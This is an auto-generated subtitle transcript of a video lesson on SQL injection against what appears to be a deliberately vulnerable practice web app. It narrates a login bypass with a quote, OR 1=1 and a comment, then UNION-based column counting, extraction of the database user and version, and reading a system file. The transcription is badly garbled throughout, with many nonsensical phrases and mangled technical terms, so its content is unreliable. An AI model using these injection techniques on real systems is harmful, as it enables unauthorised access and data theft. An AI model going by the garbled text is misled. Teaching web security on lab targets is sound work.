1
00:00:00,570 --> 00:00:05,730
So it's now in this room that we are going to talk about this escalating action and we will see the

2
00:00:05,730 --> 00:00:07,410
union in action.

3
00:00:07,820 --> 00:00:11,160
First, we need to set up some settings in the metastable.

4
00:00:11,850 --> 00:00:17,690
Without this, you will get arrows going to distract the world over the blue and military for that.

5
00:00:18,330 --> 00:00:25,770
And what you want to do is you need to create a configuration file that says no, uh, conflict.

6
00:00:30,610 --> 00:00:31,940
Of the conflict.

7
00:00:34,290 --> 00:00:35,410
Conflict, that agency.

8
00:00:35,940 --> 00:00:42,000
And what you want to change is in the speech before you to change this value to all us.

9
00:00:42,310 --> 00:00:46,980
So I have already changed previously to be mesmerized by the world.

10
00:00:48,180 --> 00:00:57,130
You need to change the two of us, no contracts and could press that button to say, you know, after

11
00:00:57,180 --> 00:01:00,660
that we need to restart the Apache Web server.

12
00:01:01,370 --> 00:01:10,710
So to do that, you need to, uh, it see, you need the date, which is the initial demolitions and

13
00:01:10,750 --> 00:01:20,760
scripts demand that will run the services like Apache, FPP, etc. and you need to set Apache reload.

14
00:01:22,080 --> 00:01:29,050
So you need to see you need to be Apache to reload, to enter the Apache Observer.

15
00:01:29,070 --> 00:01:29,930
We get shot at.

16
00:01:30,870 --> 00:01:32,580
Now, I don't want to lose.

17
00:01:32,580 --> 00:01:38,850
I want to go into a Web server browser and take the IP address of these matters where the.

18
00:01:44,050 --> 00:01:45,880
So click on this multimedia.

19
00:01:48,110 --> 00:01:50,840
And what you want to do is you need to kick this TV.

20
00:01:53,950 --> 00:02:01,090
So it will are are the database's accordingly, I needed to go to the starting line action, action

21
00:02:01,270 --> 00:02:02,250
that user for.

22
00:02:04,700 --> 00:02:12,230
So now you're saying please enter username and password computers, so let's say Nicole and Nicole.

23
00:02:15,900 --> 00:02:17,830
So it is bad from our past.

24
00:02:18,150 --> 00:02:25,230
So before going into this election and I'll discuss you one concept that you said, we have already

25
00:02:25,230 --> 00:02:28,490
discussed this in the previous video from the school basics.

26
00:02:28,680 --> 00:02:32,330
But again, I want to explain it for you.

27
00:02:32,670 --> 00:02:39,230
You start every from the stable where you constantly get ambassadors constantly.

28
00:02:40,710 --> 00:02:45,810
So in the back inside, this query returns some values.

29
00:02:46,440 --> 00:02:51,330
That means the rule of the table, which contains a username and password.

30
00:02:52,110 --> 00:02:58,800
So that will be used by BHP or Python or any other bank and programming language, and that can be used

31
00:02:58,800 --> 00:02:59,700
for authentication.

32
00:02:59,940 --> 00:03:07,560
So this query simply accepts that data from the table where username and password is Kostunica.

33
00:03:08,310 --> 00:03:12,420
So here the there is some misconfiguration.

34
00:03:12,600 --> 00:03:19,800
And what you can do is instead of making what we can tailpiece, you can type a quotation marks and

35
00:03:19,800 --> 00:03:21,600
then if you use it or.

36
00:03:23,140 --> 00:03:31,150
Or else you can put the two hyphens in space so we know what this means, it will read the structure,

37
00:03:31,150 --> 00:03:34,900
for example, that they were user name is called to blank.

38
00:03:35,200 --> 00:03:41,070
And after this discovery gets truncated because in school, this is a common trait.

39
00:03:41,980 --> 00:03:45,330
So if you type two hyphens in space, it will.

40
00:03:45,400 --> 00:03:50,810
The other part of this query will not be construed into the query.

41
00:03:51,580 --> 00:03:58,360
So now what I can do is before this comment, I can say, ah, we have already seen this are.

42
00:04:00,590 --> 00:04:03,500
Ah, I will say one is equal to one.

43
00:04:06,080 --> 00:04:16,370
So what this means is I can just simply place this value in that username feared and this word will

44
00:04:16,370 --> 00:04:21,280
be sent into this username, so this quotation mark would already be there.

45
00:04:21,290 --> 00:04:23,470
And what I want to send is only this one.

46
00:04:24,890 --> 00:04:31,430
So if I send this, it will be placed in this username, uh, fear and on reading.

47
00:04:31,430 --> 00:04:34,600
These are from various enemies close to blank.

48
00:04:34,970 --> 00:04:38,120
And it will be treated as two conditions.

49
00:04:38,240 --> 00:04:45,190
This is used in one condition or one is equal to one, which is true because one is equal to one.

50
00:04:45,200 --> 00:04:45,450
Right.

51
00:04:45,590 --> 00:04:54,050
And then this on seeing this comment, the rights are part of this comment will not will be ignored

52
00:04:54,320 --> 00:04:55,610
because it's a common trait.

53
00:04:55,820 --> 00:05:01,380
So you don't need to care about this and what this return is, it will return a true statement.

54
00:05:02,660 --> 00:05:09,380
So if you are not taking these values into the user or any variable, if you are directly saying testing

55
00:05:09,470 --> 00:05:17,340
this authentication with the query, then it will automatically allow our target.

56
00:05:17,810 --> 00:05:23,730
So it does not check about the username and password if there is a bypassing authentication.

57
00:05:23,750 --> 00:05:31,100
So if you like to put that you follow the state this statement is equal to true, then automatically

58
00:05:31,100 --> 00:05:32,290
login will be successful.

59
00:05:32,570 --> 00:05:38,960
So that's all you need to store it in variables if you do not convert was OK, this will bypass the

60
00:05:39,200 --> 00:05:40,170
Reagan authentication.

61
00:05:40,190 --> 00:05:43,640
I hope you have understood this syntax right.

62
00:05:44,840 --> 00:05:47,090
It's a very simple username.

63
00:05:47,090 --> 00:05:53,120
Feel you will put this value so that you get into this username, conditio so on.

64
00:05:53,120 --> 00:05:59,590
Checking this, it will be divided into the two conditions, which is username and the order.

65
00:06:00,170 --> 00:06:03,080
So this will be one is close to one, which is true.

66
00:06:04,280 --> 00:06:09,710
Even though username is going too fast, we don't care because one condition is true, then the whole

67
00:06:10,100 --> 00:06:11,120
class will be true.

68
00:06:11,330 --> 00:06:13,060
And this is the comment we don't get.

69
00:06:13,060 --> 00:06:15,680
So the entire statement becomes true.

70
00:06:15,680 --> 00:06:21,000
And if you call it the pourri, then you will get automatically login.

71
00:06:21,680 --> 00:06:23,960
So this is a basic of this connection.

72
00:06:24,470 --> 00:06:28,240
Now, what I can do is I put the only current quotation.

73
00:06:28,850 --> 00:06:33,650
So whenever I put the quotation and the computer's.

74
00:06:35,720 --> 00:06:40,590
I get summaries, so generally you should not get this, but this is a practice mission.

75
00:06:40,610 --> 00:06:47,740
We get letters in case if you see any websites, they get only this.

76
00:06:50,230 --> 00:06:52,510
This is a good inquiry.

77
00:06:52,700 --> 00:06:56,920
If even you get this message, it has some induction capabilities.

78
00:06:57,380 --> 00:07:03,620
So as you can see, they have already told me start from accounts where Islam is close to passwords.

79
00:07:04,970 --> 00:07:07,190
OK, now let me say this.

80
00:07:07,970 --> 00:07:15,110
So on our back, there is a select start from accounts.

81
00:07:15,110 --> 00:07:16,640
There is an account table.

82
00:07:20,590 --> 00:07:24,370
They're sticking the username and the password.

83
00:07:31,660 --> 00:07:33,890
So I think it's single.

84
00:07:37,840 --> 00:07:45,970
So right now, it's been caught and gone this week on Luter's.

85
00:07:48,560 --> 00:07:49,940
So it's a single condition.

86
00:07:53,610 --> 00:07:54,170
And.

87
00:07:59,080 --> 00:08:05,080
And pastor is called the single it's only today what the single condition, if that if single quotation

88
00:08:05,080 --> 00:08:06,520
does not work, you can put that out.

89
00:08:07,870 --> 00:08:08,850
It's not a big deal.

90
00:08:09,130 --> 00:08:13,240
So this is a very low in our military.

91
00:08:14,920 --> 00:08:23,620
OK, now what I will do is I will say no, I'm going to take this one in that username till nymphal

92
00:08:24,100 --> 00:08:29,340
that or one is equal to one, which is true.

93
00:08:29,500 --> 00:08:34,600
And I go to space and do the two I and offer this to her.

94
00:08:35,040 --> 00:08:36,340
You need to put the space.

95
00:08:36,610 --> 00:08:43,550
You must not forget the space of the two heavens to controversy.

96
00:08:43,840 --> 00:08:52,770
Now it will be like using a musical stool, uh quotation quotation or one is close to one comment to

97
00:08:52,870 --> 00:08:53,680
your candidates.

98
00:08:54,100 --> 00:08:59,200
And as you can see, there are so many details of this and that there is.

99
00:09:00,700 --> 00:09:07,930
So one thing you need to notice is even you have to start from accounts.

100
00:09:08,110 --> 00:09:14,860
After getting the result, this BHP observer may filter some of these columns and display you only a

101
00:09:14,860 --> 00:09:15,520
few columns.

102
00:09:15,850 --> 00:09:17,700
Here I have Stalactite.

103
00:09:17,740 --> 00:09:20,580
I have three columns use a certain signature.

104
00:09:20,800 --> 00:09:27,280
These three are the columns and PSP man show you only these programs.

105
00:09:27,460 --> 00:09:31,900
But in reality, we do not know how many columns this account will help.

106
00:09:32,260 --> 00:09:40,970
So we need to find a number of columns in this account so so that we can execute some variables.

107
00:09:41,920 --> 00:09:46,090
So what you can do is you can say, uh, union.

108
00:09:46,330 --> 00:09:51,510
So this union statement I did not tell in this previous video.

109
00:09:52,090 --> 00:10:01,150
So what this means is you need this union combines to reserves, but only when the two those columns

110
00:10:01,150 --> 00:10:01,670
are equal.

111
00:10:01,690 --> 00:10:11,120
So if you start from accounts and union structure from, uh, and other icons, uh, those two it was

112
00:10:11,170 --> 00:10:15,070
must have the same column numbers, a number of columns.

113
00:10:16,250 --> 00:10:18,460
So I say union noise.

114
00:10:18,520 --> 00:10:27,450
It says that, oh, what I want to do is I don't know how many columns are there.

115
00:10:27,670 --> 00:10:31,540
I simply said not and no.

116
00:10:31,690 --> 00:10:33,850
I said hyphen open space.

117
00:10:34,600 --> 00:10:36,070
Oh, let me copy this.

118
00:10:36,940 --> 00:10:38,050
So what this means is.

119
00:10:41,960 --> 00:10:51,650
Username is close to quotation, quotation and then Unions', when this condition fails, if the columns

120
00:10:51,650 --> 00:10:58,730
of these account stable does not match us with our number of values, in this case, we are sending

121
00:10:58,740 --> 00:11:07,960
we are getting Nannerl and if I can see the error, can see such statements have different number of

122
00:11:07,970 --> 00:11:15,310
columns because there is already one select, which is from a table which says, say, X number of columns,

123
00:11:15,320 --> 00:11:17,190
and here we are sending only one.

124
00:11:17,540 --> 00:11:21,870
So let me increase the number of columns that's not null.

125
00:11:23,510 --> 00:11:26,300
And there is no rule that you need to put the alternate.

126
00:11:26,330 --> 00:11:27,290
You can put the numbers.

127
00:11:27,300 --> 00:11:33,840
Also, according to the source, two columns are not sufficient.

128
00:11:33,860 --> 00:11:38,510
We need to put the three more columns and columns.

129
00:11:40,030 --> 00:11:49,390
So let me copy this, so now I am testing the trigrams, so it's also of tested for Gorham's.

130
00:11:50,650 --> 00:11:56,340
So this is somewhat tedious task, but you need if you understand the background, you get easily.

131
00:11:56,950 --> 00:11:58,920
So even that first.

132
00:12:00,580 --> 00:12:02,950
OK, now let's put five columns.

133
00:12:04,820 --> 00:12:06,960
Now, that's a controversial controversy.

134
00:12:06,980 --> 00:12:14,960
Now let's review the candidates and there you can see there are five columns in the candidate tables

135
00:12:15,770 --> 00:12:16,190
fight.

136
00:12:17,190 --> 00:12:20,250
Columns in accounts.

137
00:12:20,460 --> 00:12:27,780
But we are getting on it regardless, because this bank and BHP is filtering already for showing the

138
00:12:27,780 --> 00:12:28,490
telecoms.

139
00:12:28,830 --> 00:12:35,010
Now, what I can do is you can also put the numbers for easy understanding.

140
00:12:35,010 --> 00:12:38,790
We can sell one comma to comma, three come up for.

141
00:12:40,320 --> 00:12:47,430
And if you click on this, we are going through this and you can see username is close to two, password

142
00:12:47,430 --> 00:12:55,530
three and signature for it means that this username is the second column of this account and the password

143
00:12:55,530 --> 00:13:00,750
is the third column of the accountability and the signature is the fourth column of the accountable.

144
00:13:01,260 --> 00:13:05,160
And we do not two columns do the first column and the fifth column.

145
00:13:07,450 --> 00:13:15,910
So two, three, four columns are not.

146
00:13:19,550 --> 00:13:30,670
Now what but one thing we can do is we can get the version number of this database, so there are five

147
00:13:30,710 --> 00:13:33,260
columns right now.

148
00:13:33,260 --> 00:13:35,160
What I can do is one comma.

149
00:13:35,750 --> 00:13:42,710
So if we if we want to display any information, you need to send the information already in these two,

150
00:13:42,710 --> 00:13:47,240
three, four words because those values will be displayed in our output.

151
00:13:47,270 --> 00:13:47,880
That's it.

152
00:13:48,230 --> 00:13:54,500
This is a user facing I need to put the small letters, let's say user function.

153
00:13:55,040 --> 00:14:02,690
And this user function indicates that current username the service is running on and I consider it a

154
00:14:02,690 --> 00:14:03,560
direct Russian.

155
00:14:12,050 --> 00:14:19,650
So now I can tell you this, we are doing we are asking for a user and that version of this obscure

156
00:14:19,670 --> 00:14:27,630
database, as you can see, our killer, our user is rude at the local hospital.

157
00:14:27,730 --> 00:14:33,650
And you can see the version of this, uh, school, uh, database is Very 051.

158
00:14:33,770 --> 00:14:36,080
I want to the concert for this.

159
00:14:36,510 --> 00:14:44,510
And as you can see, if I don't like this, I automatically got some, uh, vulnerabilities related

160
00:14:44,510 --> 00:14:48,950
to this version number so I can just go out and on one of these vulnerabilities.

161
00:14:49,100 --> 00:14:53,210
And even if I have all the luck, I can find them in my.

162
00:14:55,720 --> 00:15:02,830
So we got that username and the, uh, the user and what's number and.

163
00:15:06,170 --> 00:15:08,150
What you can do is you can also

164
00:15:11,000 --> 00:15:21,500
load the file into police played into this, uh, our output Årets.

165
00:15:24,880 --> 00:15:31,310
I'm going the top under the tree, I don't know in which the tree as schools are, Otis, I could just

166
00:15:31,390 --> 00:15:33,540
go to the tree and I said, seat.

167
00:15:38,820 --> 00:15:40,150
So it's possibly.

168
00:15:45,270 --> 00:15:52,410
I'm going to I'm trying to view it, see positively fail, so they'll give.

169
00:15:53,460 --> 00:16:04,110
We got the information of this positively and you can see if there are any users within all of us or

170
00:16:04,290 --> 00:16:05,990
are just anonymous login.

171
00:16:06,030 --> 00:16:11,520
Then you can see you got logged into the system using the username.

172
00:16:14,270 --> 00:16:18,050
As you can see, user is encrypted.

173
00:16:23,890 --> 00:16:29,770
All right, now, I think we do not get any information, but you can see the services that will prove

174
00:16:29,770 --> 00:16:35,560
to be resolver and you can just Google for any of regarding that.

175
00:16:36,610 --> 00:16:41,850
So I think that's all about this union base as good indications.

176
00:16:42,160 --> 00:16:43,510
I hope you have understood.

177
00:16:44,020 --> 00:16:45,280
We are just coming by.

178
00:16:45,310 --> 00:16:47,620
We are up to now.

179
00:16:47,620 --> 00:16:49,090
Let's raise what we have done.

180
00:16:49,090 --> 00:16:53,890
We are sending this, uh, like a quotation.

181
00:16:53,890 --> 00:16:57,640
Ah, which divides the one condition into two conditions.

182
00:16:57,640 --> 00:17:04,600
And we are making it through and then we are getting the information from the, uh, Web server and

183
00:17:04,600 --> 00:17:10,360
then we are just finding a number of columns using this, uh, one, two, three, four, five, six,

184
00:17:10,360 --> 00:17:11,380
or we can keep the null.

185
00:17:11,500 --> 00:17:17,870
And then knowing the columns, we can learn which columns are displayed in this account.

186
00:17:18,370 --> 00:17:20,710
And then we are asking some information.

187
00:17:20,710 --> 00:17:23,070
We got this I got this login page.

188
00:17:23,470 --> 00:17:31,620
Now let's reconsider our previous example and know what you're going to restructure from a sample table.

189
00:17:32,060 --> 00:17:37,720
Let's assume this is a sample table and say name and the parcel right where we have got the username

190
00:17:37,720 --> 00:17:38,470
and password.

191
00:17:39,040 --> 00:17:45,550
So to bypass this authentication, we need to you should not comment because it will take for the password

192
00:17:45,550 --> 00:17:46,090
also.

193
00:17:46,420 --> 00:17:52,360
And then, uh, OK, we need we can also put the comment.

194
00:17:52,690 --> 00:17:54,660
OK, let me try that one also.

195
00:17:55,020 --> 00:17:56,320
OK, first, generally

196
00:17:58,750 --> 00:18:08,530
this will be the username field and what I keep in this user, uh, username is I put the current to

197
00:18:08,530 --> 00:18:15,610
make sure that this is one condition and then I put the R because I want to put the true condition here

198
00:18:15,610 --> 00:18:18,490
so that this condition all becomes true.

199
00:18:19,810 --> 00:18:23,020
And let's say let's use the strings.

200
00:18:23,020 --> 00:18:23,320
No.

201
00:18:25,790 --> 00:18:26,960
One is he calls to.

202
00:18:30,480 --> 00:18:37,520
So I need to put another quotation, because there is already a quotation that is belongs to this username.

203
00:18:38,250 --> 00:18:39,040
So let me.

204
00:18:39,420 --> 00:18:48,580
So now it will be like this username is going to blank or one is equal to one, which becomes true.

205
00:18:52,470 --> 00:18:54,240
So I will reward this.

206
00:19:06,470 --> 00:19:12,740
So this is the username for the guys in the previous video, we have both at the same time, but in

207
00:19:12,740 --> 00:19:18,290
this video we have to fear is a right name and the password.

208
00:19:18,300 --> 00:19:21,310
So it's being checked two times.

209
00:19:21,470 --> 00:19:24,740
I can simply copy paste this or whatever.

210
00:19:24,740 --> 00:19:30,580
I put the username, I can just copy paste enough password filters and there you go.

211
00:19:30,980 --> 00:19:34,230
You can just simply paste this and you can try to again.

212
00:19:34,970 --> 00:19:36,080
So let me take this.

213
00:19:38,080 --> 00:19:39,820
No, I'm giving a condition.

214
00:19:45,380 --> 00:19:53,460
Because we didn't use them in the past and they you can see we have been successfully constructing as.

215
00:19:54,020 --> 00:19:55,850
And I'd been amazed monkey.

216
00:19:56,330 --> 00:20:04,820
OK, so this is all about this bypassing other using this our base is a good indication.

217
00:20:06,530 --> 00:20:13,940
So I hope you have understood we just like in the previous case scenario, we just what we are done

218
00:20:13,940 --> 00:20:19,310
is we have to change it to shrink so that we do not get any conversions when we send the data.

219
00:20:19,640 --> 00:20:20,630
So that's all we did.

220
00:20:21,080 --> 00:20:27,200
But it's for two times when you saw username and password, if it's successful for you, it will be

221
00:20:27,350 --> 00:20:28,850
so successful for the password.